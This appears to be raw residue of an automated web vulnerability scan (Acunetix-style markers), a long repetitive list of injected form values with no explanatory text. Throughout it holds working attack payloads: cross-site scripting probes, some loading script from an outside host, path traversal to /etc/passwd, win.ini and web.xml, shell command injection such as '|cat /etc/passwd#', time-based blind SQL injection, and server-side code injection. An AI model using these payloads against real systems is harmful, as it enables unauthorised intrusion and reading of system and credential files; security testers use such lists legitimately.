!(()&&!|*|*|

1

1

1<script>prompt(905246)</script>

"|"ld

testasp.vulnweb.com

-1)

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

1

1<ScRiPt >prompt(944459)</ScRiPt>

1

-1))

1

/etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994615></ScRiPt>

WEB-INF/web.xml

'"()

1

qisGAjWq'

1

1

1<ScRiPt >prompt(952617)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF\web.xml

'

1

1

1

qZEs7jJk')

1

1<video><source onerror="javascript:prompt(964711)">

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

rSRA1RQd'))

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973742)"></g></svg>

1

-1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

................etc/passwd

1

1

1

1<div style=width:expression(prompt(929092))>

-1)

&dir

1

1

"

acunetix_wvs_invalid_filename

1<iframe src='data:text/html

1

1

-1))

http://hitJPBTqdjsvw.bxss.me/

'&dir&'

1

${@print(md5(acunetix_wvs_security_test))}

1<body onload=prompt(908818)>

comments

xzv45a50'

file:///etc/passwd

1

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965774)>

comments

RFMVLg3k')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

RbY8tvOa'))

1<img src=xyz OnErRor=prompt(934723)>

|dir

1

comments/.

1

WEB-INF/web.xml

1

1<img/src=">" onerror=alert(981778)>

1

'|dir

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(988884)</sCripT>

WEB-INF\web.xml

http://www.acunetix.tst

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1&lt

1

'"

1

1

1'"()&%<ScRiPt >prompt(947642)</ScRiPt>

1

1

<!--

1

1

1

../../../../../../../../../../boot.ini

<img acu onmouseover=prompt(980796) //>

1

'"()&%<ScRiPt >prompt(956921)</ScRiPt>

1

1<input autofocus onfocus=prompt(989599)>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_938553

<a href='http://www.acunetix.com'>website security</a>

1

windowswin.ini

1

1

response.write(9995752*9147661)

1

1

1

................windowswin.ini

&cat /etc/passwd&

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9995752*9147661)+'

1

1

'&cat /etc/passwd&'

1_IY03B <ScRiPt >prompt(938794)</ScRiPt>

"+response.write(9995752*9147661)+"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

acu6981<s1﹥s2ʺs3ʹuca6981

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

acux6445z1z2abcxuca6445

1

1

cat /etc/passwd

1<ScRiPt >prompt(957103)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

if(now()=sysdate(),sleep(11.346),0)/*'XOR(if(now()=sysdate(),sleep(11.346),0))OR'"XOR(if(now()=sysdate(),sleep(11.346),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<script>prompt(988629)</script>

`cat /etc/passwd`

1

1

1

(select(0)from(select(sleep(11.346)))v)/*'+(select(0)from(select(sleep(11.346)))v)+'"+(select(0)from(select(sleep(11.346)))v)+"*/

1

1

1<ScRiPt >prompt(999255)</ScRiPt>

${99870+99384}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

1

|cat /etc/passwd#

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963686></ScRiPt>

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

-1)

1&n969416=v982393

1<ScRiPt >prompt(922116)</ScRiPt>

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

"|"ld

1<video><source onerror="javascript:prompt(968760)">

1

testasp.vulnweb.com

tTcVI0KX'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992987)"></g></svg>

1

x3lL6JMc')

1

'"()

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<div style=width:expression(prompt(939280))>

1

'

1

U5Kwhjct'))

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<iframe src='data:text/html

1

1

"

-1

1

1

1

1<body onload=prompt(921270)>

1

1

/etc/passwd

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946164)>

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1))

1<img src=xyz OnErRor=prompt(953089)>

'

1

&dir

acunetix_wvs_invalid_filename

1<img/src=">" onerror=alert(985727)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitHlWLBFPbcl.bxss.me/

sTYNV0az'

1

1

1

"

comments

1<ScRiPt%20>prompt(996621)</sCripT>

'&dir&'

1

wIlvnYOY')

................etc/passwd

1

1

1

1&lt

comments

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

U7ytrmlI'))

<img acu onmouseover=prompt(967451) //>

1

http://www.acunetix.tst

comments/.

${@print(md5(acunetix_wvs_security_test))}\

1

1

|dir

1

1

1<input autofocus onfocus=prompt(957830)>

1

file:///etc/passwd

1

'"

1

1

<a href='http://www.acunetix.com'>website security</a>

<!--

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"|dir

1

1

1

1

1

1_j76wS <ScRiPt >prompt(954692)</ScRiPt>

1

1'"()&%<ScRiPt >prompt(990386)</ScRiPt>

WEB-INF/web.xml

1

1

response.write(9453862*9299818)

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1

1

'+response.write(9453862*9299818)+'

'"()&%<ScRiPt >prompt(995088)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9453862*9299818)+"

1_939497

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../boot.ini

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

acu5230<s1﹥s2ʺs3ʹuca5230

cat /etc/passwd

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux3248z1z2abcxuca3248

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

1

1

if(now()=sysdate(),sleep(9.561),0)/*'XOR(if(now()=sysdate(),sleep(9.561),0))OR'"XOR(if(now()=sysdate(),sleep(9.561),0))OR"*/

windowswin.ini

1

1<ScRiPt >prompt(950225)</ScRiPt>

|cat /etc/passwd#

1

${99483+99752}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3.187)))v)/*'+(select(0)from(select(sleep(3.187)))v)+'"+(select(0)from(select(sleep(3.187)))v)+"*/

1

................windowswin.ini

1<script>prompt(935044)</script>

'|'ld

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1

1<ScRiPt >prompt(904839)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1&n977135=v917025

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?974593></ScRiPt>

-1)

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

testasp.vulnweb.com

1<ScRiPt >prompt(910051)</ScRiPt>

-1))

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

!(()&&!|*|*|

'

V3cyutBu'

.\./.\./.\./.\./.\./.\./etc/passwd

1<video><source onerror="javascript:prompt(952006)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'"()

^(#$!@#$)(()))******

1

1

"

1

mcECVnyQ')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933649)"></g></svg>

1

/etc/passwd

1

1

1

1

qMdCHKDD'))

1<div style=width:expression(prompt(922114))>

1

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF/web.xml

&dir

-1

1

1<iframe src='data:text/html

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

'&dir&'

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<body onload=prompt(922206)>

WEB-INF\web.xml

1

1

1

-1))

acunetix_wvs_invalid_filename

"

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972463)>

................etc/passwd

1

http://hitoBsgvHuxqE.bxss.me/

|dir

1

kbN7ILFd'

comments

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=xyz OnErRor=prompt(960978)>

1

1OhLaNkX')

'|dir

comments

1

1

1<img/src=">" onerror=alert(927977)>

${@print(md5(acunetix_wvs_security_test))}\

1

comments/.

84hwe1gp'))

1

file:///etc/passwd

"|dir

1

1<ScRiPt%20>prompt(965014)</sCripT>

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1&lt

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

'"

WEB-INF/web.xml

1

<img acu onmouseover=prompt(952404) //>

1

<!--

1

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(984878)</ScRiPt>

1

1

1

1

1

1<input autofocus onfocus=prompt(998511)>

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(970739)</ScRiPt>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

../../../../../../../../../../boot.ini

response.write(9884189*9576754)

1_992115

[url=http://www.acunetix.com]website security[/url]

1

1

1

'+response.write(9884189*9576754)+'

&cat /etc/passwd&

1_PepxJ <ScRiPt >prompt(964447)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9884189*9576754)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

windowswin.ini

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

................windowswin.ini

1

1

1

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu8799<s1﹥s2ʺs3ʹuca8799

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd

1

1

acux10804z1z2abcxuca10804

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3.047),0)/*'XOR(if(now()=sysdate(),sleep(3.047),0))OR'"XOR(if(now()=sysdate(),sleep(3.047),0))OR"*/

1<ScRiPt >prompt(920237)</ScRiPt>

${99319+99292}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(937786)</script>

1

1

|cat /etc/passwd#

1

(select(0)from(select(sleep(6.094)))v)/*'+(select(0)from(select(sleep(6.094)))v)+'"+(select(0)from(select(sleep(6.094)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<ScRiPt >prompt(917333)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n980472=v951265

1

-1

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916196></ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

-1)

1

)

1

1<ScRiPt >prompt(977855)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

!(()&&!|*|*|

1

-1))

1<video><source onerror="javascript:prompt(922725)">

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

'"()

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952607)"></g></svg>

1

WEB-INF\web.xml

sapHHZVn'

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

"

1

1

1<div style=width:expression(prompt(919854))>

1

e9cixDnh')

1

1

1<iframe src='data:text/html

/etc/passwd

1

1

1

||cat /etc/passwd

1

1

dcw4mlCg'))

1<body onload=prompt(956310)>

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(972247)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

http://hitYIwxC7ihh2.bxss.me/

1

acunetix_wvs_invalid_filename

1

1<img src=xyz OnErRor=prompt(969078)>

-1)

1

"

"&dir&"

................etc/passwd

1

comments

1

1

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(936854)>

1

|dir

-1))

1

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(903017)</sCripT>

1

1

1

comments/.

3UGKERQx'

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1&lt

1

HnNGr0iR')

'|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

LeszRCFy'))

<img acu onmouseover=prompt(938238) //>

1

1

WEB-INF/web.xml

1

<!--

"|dir

1

1

1<input autofocus onfocus=prompt(960151)>

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(979826)</ScRiPt>

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'"()&%<ScRiPt >prompt(927119)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

[url=http://www.acunetix.com]website security[/url]

response.write(9825538*9882777)

1

1

1_988531

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9825538*9882777)+'

../../../../../../../../../../boot.ini

1_95joe <ScRiPt >prompt(935265)</ScRiPt>

1

1

'&cat /etc/passwd&'

"+response.write(9825538*9882777)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

1

1

1

1

windowswin.ini

1

1

1

1

1

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

${100329+99178}

1

1

acu5273<s1﹥s2ʺs3ʹuca5273

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

|cat /etc/passwd#

1

1

acux5729z1z2abcxuca5729

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt >prompt(975725)</ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

'|'ld

1&n990889=v930228

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

-1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<script>prompt(937771)</script>

"|"ld

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(976164)</ScRiPt>

1

)

-1))

1

testasp.vulnweb.com

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913458></ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1IxUiU9A'

1

1

WEB-INF/web.xml

1

'

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(990165)</ScRiPt>

mlqSjA96')

WEB-INF\web.xml

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

"

'"()

1

1<video><source onerror="javascript:prompt(937367)">

wkoZDUhh'))

1

1

1

/etc/passwd

1

-1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987924)"></g></svg>

1

1

||cat /etc/passwd

1

1

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<div style=width:expression(prompt(903498))>

1

1

1

&dir

-1))

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'

Xc3C3A7b'

1

'&dir&'

1<body onload=prompt(904966)>

1

1

................etc/passwd

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955220)>

sOOG5Bs4')

"

1

"&dir&"

1

1

http://hittvEQqAxaCz.bxss.me/

comments

1<img src=xyz OnErRor=prompt(977486)>

jRAIeSmr'))

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(927229)>

1

comments

1

1

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1<ScRiPt%20>prompt(958021)</sCripT>

comments/.

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

'|dir

1&lt

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

1'"()&%<ScRiPt >prompt(909950)</ScRiPt>

1

<img acu onmouseover=prompt(979326) //>

"|dir

1

1

1

1

'"()&%<ScRiPt >prompt(961525)</ScRiPt>

<!--

1

1

1

1<input autofocus onfocus=prompt(953225)>

1

1

1_909337

1

WEB-INF/web.xml

1

response.write(9446743*9826374)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

WEB-INF\web.xml

1

1

'+response.write(9446743*9826374)+'

1

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini

&cat /etc/passwd&

"+response.write(9446743*9826374)+"

1

1

1_DbGBO <ScRiPt >prompt(941526)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../boot.ini

1

1

acu10404<s1﹥s2ʺs3ʹuca10404

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

acux2359z1z2abcxuca2359

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

1

1

1<ScRiPt >prompt(912090)</ScRiPt>

windowswin.ini

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<script>prompt(985566)</script>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

${99761+99131}

1<ScRiPt >prompt(903626)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

..\..\..\..\..\..\..\..\windows\win.ini

1

|cat /etc/passwd#

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909474></ScRiPt>

1some_inexistent_file_with_long_name%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1&n984814=v905627

/.\./.\./.\./.\./.\./.\./windows/win.ini

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<ScRiPt >prompt(935621)</ScRiPt>

1

1

OwpJY1lg'

!(()&&!|*|*|

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(979213)">

"|"ld

testasp.vulnweb.com

1

H2bhDyYG')

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904399)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

5EiQ7sW7'))

1<div style=width:expression(prompt(952497))>

1

'"()

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1<iframe src='data:text/html

1

1

1

-1

/etc/passwd

WEB-INF/web.xml

1

1

1<body onload=prompt(964749)>

"

1

1

-1)

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917673)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

-1))

1

1

'

1<img src=xyz OnErRor=prompt(912240)>

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img/src=">" onerror=alert(915565)>

p9kN8ki9'

1

http://hitcgYi7Gp1Iv.bxss.me/

"

&dir

1

comments

1<ScRiPt%20>prompt(994233)</sCripT>

ZHE1Jk00')

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

'&dir&'

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

YEa4RUHJ'))

1&lt

1

comments

1

1

1

1

<img acu onmouseover=prompt(933118) //>

"&dir&"

comments/.

1

file:///etc/passwd

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<input autofocus onfocus=prompt(919245)>

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

http://www.acunetix.tst

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'"

1

'|dir

WEB-INF/web.xml

1

[url=http://www.acunetix.com]website security[/url]

<!--

1

1

1

1

1

WEB-INF\web.xml

1_ZjgB7 <ScRiPt >prompt(937400)</ScRiPt>

"|dir

1

response.write(9791041*9089963)

1'"()&%<ScRiPt >prompt(904298)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

'"()&%<ScRiPt >prompt(958135)</ScRiPt>

'+response.write(9791041*9089963)+'

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9791041*9089963)+"

1_942444

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1

windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

acu6564<s1﹥s2ʺs3ʹuca6564

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

acux6721z1z2abcxuca6721

|cat /etc/passwd#

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

${100031+99755}

1

-1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(953042)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n949167=v927985

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1)

"|"ld

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(997981)</script>

1some_inexistent_file_with_long_name%00.jpg

-1))

!(()&&!|*|*|

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

.\./.\./.\./.\./.\./.\./etc/passwd

1<ScRiPt >prompt(959033)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

YoJV2p8M'

^(#$!@#$)(()))******

1

1

1

/etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917220></ScRiPt>

testasp.vulnweb.com

'

KulrmFFF')

1

1

'"()

1

1<ScRiPt >prompt(961012)</ScRiPt>

1

WEB-INF/web.xml

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

RDlTkuLF'))

1

1

1

1

1<video><source onerror="javascript:prompt(924464)">

1

1

-1

WEB-INF\web.xml

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977686)"></g></svg>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

................etc/passwd

1

&dir

1

1

'

1<div style=width:expression(prompt(947605))>

-1))

1

1

1

1

'&dir&'

1

1

1<iframe src='data:text/html

fY1DkXEa'

http://hitDymUzUOvXo.bxss.me/

"

acunetix_wvs_invalid_filename

QKebVCju')

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<body onload=prompt(930406)>

"&dir&"

1

file:///etc/passwd

comments

xE4l7Q0W'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990831)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

comments

|dir

1

1

1

1

1<img src=xyz OnErRor=prompt(905513)>

1

1

comments/.

'|dir

WEB-INF/web.xml

1

1

'"

http://www.acunetix.tst

1

1<img/src=">" onerror=alert(901089)>

1

1

1

WEB-INF\web.xml

"|dir

<!--

1

1<ScRiPt%20>prompt(909143)</sCripT>

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

1

1

1&lt

1

../../../../../../../../../../boot.ini

1

1

1'"()&%<ScRiPt >prompt(916811)</ScRiPt>

1

1

response.write(9486530*9978915)

<img acu onmouseover=prompt(929102) //>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

'"()&%<ScRiPt >prompt(999410)</ScRiPt>

'+response.write(9486530*9978915)+'

1<input autofocus onfocus=prompt(928961)>

1

windowswin.ini

1

"+response.write(9486530*9978915)+"

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1_965212

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_z4DLh <ScRiPt >prompt(919830)</ScRiPt>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

